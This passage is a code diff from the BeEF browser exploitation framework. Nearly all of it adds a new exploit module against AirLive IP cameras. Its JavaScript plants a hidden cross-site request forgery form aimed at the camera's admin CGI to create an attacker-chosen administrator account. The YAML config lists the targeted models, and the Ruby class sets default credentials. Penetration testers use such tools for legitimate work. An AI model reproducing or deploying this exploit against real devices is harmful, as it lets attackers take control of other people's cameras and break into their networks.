+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
                 XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
                     function byteValue(x) {
                         return x.charCodeAt(0) & 0xff;
@@ -362,7 +362,7 @@ beef.execute(function () {
 
     log = function(data){
         beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
-        console.log(data);
+        beef.debug(data);
     };
 
 

modules/exploits/camera/airlive_ip_camera_csrf/command.js

@@ -0,0 +1,30 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base  = '<%= @base %>'; 
+  var path  = 'cgi-bin/admin/usrgrp.cgi';
+  var user  = '<%= @user %>';
+  var pass  = '<%= @pass %>';
+
+  var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET",
+    [{'type':'hidden', 'name':'user',     'value':user},
+     {'type':'hidden', 'name':'pwd',      'value':pass},
+     {'type':'hidden', 'name':'grp',      'value':'administrator'},
+     {'type':'hidden', 'name':'sgrp',     'value':'ptz'},
+     {'type':'hidden', 'name':'action',   'value':'add'},
+     {'type':'hidden', 'name':'redirect', 'value':''}
+    ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/camera/airlive_ip_camera_csrf/config.yaml

@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# For more information see:
+# http://www.exploit-db.com/exploits/26174/
+##
+beef:
+    module:
+        airlive_add_user_csrf:
+            enable: true
+            category: ["Exploits", "Camera"]
+            name: "Airlive Add User CSRF"
+            description: "Attempts to add an admin user on a Airlive camera.<br/><br/>This CSRF is reported to work on the following models: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.</br/><br/>Note: This module has not been tested on a real device."
+            authors: ["bcoles", "Eliezer Varadé Lopez", "Javier Repiso Sánchez", "Jonás Ropero Castillo"]
+            target:
+                unknown: ["ALL"]

modules/exploits/camera/airlive_ip_camera_csrf/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Airlive_add_user_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root',  'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'},
+			{'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end